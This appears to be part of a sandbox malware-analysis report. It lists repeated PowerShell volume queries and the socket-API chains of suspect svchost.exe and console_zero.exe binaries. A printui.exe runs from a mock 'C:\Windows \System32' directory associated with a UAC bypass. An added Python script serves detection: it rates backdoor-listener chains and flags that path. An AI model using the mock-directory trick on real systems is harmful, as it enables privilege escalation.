Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1A54 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter, 10_2_00007FF67A0E1A54
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 28_2_00007FF8B83AB3F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B1EA6 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B1EA6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 28_2_00007FF8B837EFC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B2130 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B2130
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B1EA6 bind,WSAGetLastError, 34_2_00007FF8B83B1EA6
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 34_2_00007FF8B837EFC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B2130 bind,WSAGetLastError, 34_2_00007FF8B83B2130
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 34_2_00007FF8B83AB3F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8367410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError, 34_2_00007FF8B8367410
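The socket-API chains listed above for svchost.exe and console_zero.exe are the evidence behind the "open a port and listen for incoming connection (possibly a backdoor)" signature in this report's summary. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses "Code function" lines of this shape and rates each function's chain. It treats socket → bind → getsockname → listen → socket → connect → accept inside one function as the loopback socketpair() emulation common in networking libraries (rated low on its own), bind → listen as a real listener (rated high), and notes two other things a reviewer of these lines would want flagged: the trailing-space "C:\Windows \System32" path of printui.exe, which is the mock-directory layout the TrustedPath UAC-bypass Sigma rule keys on, and the GetSystemTimeAsFileTime … QueryPerformanceCounter sequence in that binary, which is MSVC's stack-cookie initialisation rather than a timing check. The chain names, confidence labels and note wording are this example's own conventions; the sample input is the ten "Code function" lines from this section.

```python
"""Parse Joe Sandbox 'Code function' evidence lines and rate the socket-API chains they list.
Added example; not part of the sandbox report or its tooling."""
import re
from dataclasses import dataclass, field

# One evidence line looks like:
#   Source: <path> Code function: <pid_ctx_addr> api1,api2,...,apiN, <pid_ctx_addr>
LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+Code function:\s+"
    r"(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<apis>[A-Za-z0-9_,]+?),?\s+(?P=func)\s*$"
)

# Ordered chains: every name must occur after the previous one in the function's
# import list. Most specific first, so the socketpair shape wins over plain listener.
CHAINS = [
    # socket -> bind -> getsockname -> listen -> socket -> connect -> accept inside ONE
    # function is the loopback socketpair() emulation used by many networking libraries:
    # it listens only long enough to connect to itself, so rate it low on its own.
    ("socketpair-like", "low",
     ("socket", "bind", "getsockname", "listen", "socket", "connect", "accept")),
    ("listener", "high", ("bind", "listen")),   # bind then listen: a server socket
    ("bind-only", "info", ("bind",)),           # UDP, or a client pinning its source
]
# MSVC's __security_init_cookie seeds the stack cookie with exactly this sequence.
COOKIE_INIT = ("GetSystemTimeAsFileTime", "GetCurrentProcessId", "GetCurrentThreadId",
               "GetTickCount", "QueryPerformanceCounter")


@dataclass
class Evidence:
    source: str
    func: str
    apis: list
    label: str = "none"
    confidence: str = "none"
    notes: list = field(default_factory=list)


def has_ordered_chain(apis, chain):
    """True if every name in chain occurs in apis, in that order (repeats allowed)."""
    pos = 0
    for name in chain:
        try:
            pos = apis.index(name, pos) + 1
        except ValueError:
            return False
    return True


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a]
    return Evidence(m.group("source"), m.group("func"), apis)


def classify(ev):
    for label, confidence, chain in CHAINS:
        if has_ordered_chain(ev.apis, chain):
            ev.label, ev.confidence = label, confidence
            break
    if ev.label != "none" and ("inet_pton" in ev.apis or "strtoul" in ev.apis):
        ev.notes.append("bind address/port parsed from a string (inet_pton/strtoul)")
    if ev.label == "listener" and "accept" not in ev.apis:
        ev.notes.append("no accept() in this function; accept loop is elsewhere")
    if has_ordered_chain(ev.apis, COOKIE_INIT):
        ev.notes.append("MSVC __security_init_cookie sequence (stack-cookie seed)")
    # The path is evidence too: a directory named "Windows " (trailing space) is the
    # mock-directory layout the TrustedPath UAC-bypass Sigma rule in this report keys on.
    if re.search(r"\\Windows \\", ev.source):
        ev.notes.append("runs from a mock 'C:\\Windows \\System32' directory")
    return ev


def analyze(lines):
    return [classify(ev) for ev in map(parse_line, lines) if ev is not None]


def summarize(results):
    """Strongest label per Source path."""
    rank = {"none": 0, "bind-only": 1, "socketpair-like": 2, "listener": 3}
    best = {}
    for ev in results:
        if rank[ev.label] > rank[best.setdefault(ev.source, "none")]:
            best[ev.source] = ev.label
    return best


# Sample input: the ten "Code function" lines from this section of the report.
SAMPLE = [
    r"Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1A54 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter, 10_2_00007FF67A0E1A54",
    r"Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 28_2_00007FF8B83AB3F0",
    r"Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B1EA6 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B1EA6",
    r"Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 28_2_00007FF8B837EFC0",
    r"Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B2130 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B2130",
    r"Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B1EA6 bind,WSAGetLastError, 34_2_00007FF8B83B1EA6",
    r"Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 34_2_00007FF8B837EFC0",
    r"Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B2130 bind,WSAGetLastError, 34_2_00007FF8B83B2130",
    r"Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 34_2_00007FF8B83AB3F0",
    r"Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8367410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError, 34_2_00007FF8B8367410",
]

if __name__ == "__main__":
    results = analyze(SAMPLE)
    for ev in results:
        print(f"{ev.source:40} {ev.func}  {ev.label:15} {ev.confidence:5} {'; '.join(ev.notes)}")
    print(summarize(results))
```

The rating is per function because that is the granularity of the sandbox's static evidence: the same svchost.exe module has one function with the complete socketpair shape and another (28_2_00007FF8B837EFC0) that parses an address string and calls bind then listen without socket or accept, so the accept loop lives elsewhere. The listener verdict for svchost.exe and console_zero.exe rests on that second function; confirm it against the report's runtime network section rather than the API list alone.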
Legend of the contacted-IP location map (image not reproduced): countries shaded by share of contacted IPs, in four buckets: < 25%, 25% to 50%, 50% to 75%, > 75%.